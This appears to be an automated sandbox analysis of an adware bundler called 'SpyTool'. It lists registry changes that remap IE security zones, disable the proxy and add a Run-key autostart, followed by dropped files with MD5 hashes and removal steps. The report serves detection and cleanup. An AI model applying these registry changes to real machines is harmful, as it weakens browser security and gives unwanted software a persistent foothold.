[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 0E 1C 6F AE 6F 59 22 EF 92 79 F2 84 4F 1B F0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process encrypt.exe:644 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 62 35 BD 22 7B 4E E7 EE C5 D9 D2 EF 20 5F 41"
The process encrypt.exe:1796 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E DC FA EB 29 06 C3 B3 66 63 05 85 1C 2B D5 8D"
The process encrypt.exe:1900 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 E5 82 6C 0B 1D 87 48 8F E6 ED DA ED BF 44 FA"
The process encrypt.exe:1484 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA AA F0 DD CD DA 79 2F 79 DF 9C B8 88 72 B5 14"
The process upgmsd_re_005010082.exe:380 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "4D9487DA-C20F-42AA-8C08-26CD204C8AD0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 98 79 30 F3 6F 9A 12 BF D1 3F EE 0D E9 2D F0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010082.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsd33.tmp:432 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 6E BD 6C 1D DB DB 9D 8A 27 09 72 FF B9 3B 3E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nskA.tmp:1676 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B6 A3 70 70 DE E3 EA 4E 9A 1E CD 58 B6 26 88"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsc14.tmp:1452 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 A5 82 D7 D2 7E CB 01 97 4D A3 35 9E F3 36 DB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-cpm-opw-crb-crr"
Dropped PE files
| MD5 | File path |
|---|---|
| 9dcf0acd82ac35d87c4736b5759dbed5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe |
| cbcbe1f76f434a3b41c0148b62e6fbff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\2835.exe |
| c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3290\setup.exe |
| 2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe |
| c0157ad57d34d1d608adea523b228266 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bitool.dll |
| 20f288aa7d995a4bfcb240b66383ebf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc43.tmp |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg2E.tmp\Registry.dll |
| 8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh37.tmp |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi32.tmp\Registry.dll |
| 40f572954315a15187b4db88207eff21 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nskA.tmp |
| f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl10.tmp\inetc.dll |
| af9ca50f59a20b145c7b00ca8f7c63cc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn4.tmp |
| 0116a50101c4107a138a588d1e46fca5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\Banner.dll |
| b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\Math.dll |
| c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\System.dll |
| e541458cfe66ef95ffbea40eaaa07289 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\inetc.dll |
| 0745ff646f5af1f1cdd784c06f40fce9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\md5dll.dll |
| c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\nsDialogs.dll |
| 42df1fbaa87567adf2b4050805a1a545 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso46.tmp\xml.dll |
| f9a709bbecced10d4a84f93c75604e04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss2A.tmp |
| fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu1B.tmp |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx3B.tmp\Registry.dll |
| e7bf0b4417fa8afc5dbb90c1c9f9ecb8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz48.tmp |
| 8a77f074c6628b81f94e144784f32adb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe |
| f9a709bbecced10d4a84f93c75604e04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe |
| cbcbe1f76f434a3b41c0148b62e6fbff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe |
| e7bf0b4417fa8afc5dbb90c1c9f9ecb8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[2].exe |
| 20f288aa7d995a4bfcb240b66383ebf4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\smt[1].exe |
| b638732ad509ece4839c3329584ea42b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe |
| c0157ad57d34d1d608adea523b228266 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BiTool[1].dll |
| f77f6b517cf2e893cfcb107444f14495 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\df4a6a3ed77e60d6758afca091ca0c1f[1].exe |
| ceea099a2589b086940ea7e1333a3ad9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe |
| c1a6ac14dc23a321fd7de2c9b1fb8aa6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe |
| ad3ce40da858a76f235974af46c18365 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
| 5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VISWHQk[1].exe |
| 2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe |
| c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
| c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
| e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
| 0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
| 6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
| 72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
| c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
| 634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
| 6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
| 17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
| 2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
| a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
| 302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
| 814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
| 90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
| 4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
| cbcbe1f76f434a3b41c0148b62e6fbff | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
| fb5ec0a6cbe2673c804cd8775211aaf2 | c:\Program Files\gmsd_re_005010082\gamesdesktop_widget.exe |
| 575674a22e3e25641c1cf0eff4bf4aec | c:\Program Files\gmsd_re_005010082\gmsd_re_005010082.exe |
| 0f24cc698735914b57dceaacd83487a3 | c:\Program Files\gmsd_re_005010082\predm.exe |
| 0ff72e16329a69960686a61ea9943c1d | c:\Program Files\gmsd_re_005010082\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsb27.tmp:1920
nst20.tmp:1040
nsh37.tmp:1376
nss2A.tmp:1600
nss2A.tmp:228
gmsd_re_005010082.exe:436
tasklist.exe:1920
tasklist.exe:1068
setup.exe:268
nsn4.tmp:224
taskkill.exe:484
taskkill.exe:220
wmic.exe:1524
amisid.exe:224
amisid.exe:1228
nsp1D.tmp:1376
%original file name%.exe:1704
nsd3C.tmp:1776
nsd3C.tmp:848
2835.exe:792
encrypt.exe:644
encrypt.exe:1796
encrypt.exe:1900
encrypt.exe:1484
upgmsd_re_005010082.exe:380
nsd33.tmp:432
nskA.tmp:1676
nsc14.tmp:1452 - Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2A.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[2].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\Registry.dll (784 bytes)
